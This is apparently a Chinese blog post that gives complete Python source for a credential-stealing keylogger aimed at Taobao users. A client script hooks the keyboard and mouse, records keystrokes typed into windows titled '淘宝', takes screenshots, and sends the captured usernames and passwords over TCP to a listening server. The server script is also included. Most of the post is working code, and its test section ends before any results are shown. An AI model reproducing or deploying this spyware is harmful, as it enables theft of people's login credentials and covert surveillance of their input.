Python:通过远程监控用户输入来获取淘宝账号和密码的实验
在前面两篇文章中实现了将用户输入信息抓取到后,写入文件,把用户操作的截图也保存了下来,但些文件是在用户的机器上的,获取到并不容易,本次再次优化了下,将用户输入发送到监控者的电脑上,图片传送回来目前还没有实现,后续在分析。
一、代码:
服务端(hook_server.py):
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
def hook_tcp_server():
"""
Function:接收远程机器上发送过来的信息并输入出到终端
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34586
buf_size = 1024
addr =(host, port)
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.bind(addr)
tcp_server_socket.listen(5)
print "waiting for connectiong..."
while True:
tcp_client_socket, addr = tcp_server_socket.accept()
# print "connected from :", addr
while True:
msg = tcp_client_socket.recv(buf_size)
print msg
if not msg:
break
tcp_client_socket.close()
tcp_server_socket.close()
if __name__ == "__main__":
hook_tcp_server()
- 客户端(hook_client.py):
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pythoncom
import pyHook
import time
from PIL import ImageGrab
import socket
def send_msg_to_remote(msg):
"""
Function:向远程服务器发送信息
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
host = "192.168.1.101"
port = 34586
buf_size = 1024
addr =(host, port)
if len(msg) != 0:
tcp_client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
tcp_client_sock.connect(addr)
except IOError, e:
print ("Error:%s" % e.args[0])
tcp_client_sock.close()
data = time.strftime("[%Y-%m-%d %H:%M:%S]",time.localtime(time.time()))
tip_info = data + "from " + socket.gethostname() + ":"
tcp_client_sock.sendall(tip_info + msg)
tcp_client_sock.close()
def onMouseEvent(event):
"""
Function:处理鼠标左键单击事件,如果当前MSG中存放了信息,
将其写入文件,因为有的用户在输入 完用户名后,不是使用TAB键切换到密码
框,而是通过鼠标切换到密码输入窗口这种情况应该属于大多数网民的习惯,
所以此处要判断是否通过鼠标切换了输入窗口
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
global MSG
if len(MSG) != 0:
send_msg_to_remote(MSG)
MSG = ""
#屏幕抓图实现
pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
pic = ImageGrab.grab()
pic.save("%s.png" % pic_name)
#保存成为以日期命名的图片
return True
def onKeyboardEvent(event):
"处理键盘事件"
"""
Function:处理键盘事件,如果当前窗口为TAOBAO页面,刚开始监控并记录用户输入
因为此时用户可能准备输入用户名及密码进行登陆,所以将用户输入的所有可见
的ascii字符记录下来,此处要考虑用户是否使用了TAB键或回车键来
结束输入,此时要将信息发送给远程服务器。
Input:even
Output: Ture
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
global MSG
if event.WindowName.decode("GBK").find(u"淘宝") != -1:
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
if (event.Ascii == 9) or (event.Ascii == 13):
send_msg_to_remote(MSG)
MSG = ""
#屏幕抓图实现
pic_name = time.strftime("%Y%m%d%H%M%S",time.localtime(time.time()))
pic = ImageGrab.grab()
#保存成为以日期命名的图片
pic.save("%s.png" % pic_name)
return True
if __name__ == "__main__":
"""
Function:获取TAOBAO账号及密码,增加抓图功能
Input:NONE
Output: NONE
author: socrates
blog:http://blog.csdn.net/dyx1024
date:2012-03-03
"""
MSG = ""
#创建hook句柄
hm = pyHook.HookManager()
#监控鼠标
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
#监控键盘
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
#循环获取消息
pythoncom.PumpMessages()
二、测试:
1、环境信息:
服务端脚本hook_server.py运行于Unbutu上(IP:192.168.1.101,监听端口:34586)
客户端脚本hook_client.py运行于Windows xp上(主机名:winxp-duanyx)
2、实测:
用户界面输入:
服务器上获取到的数据:
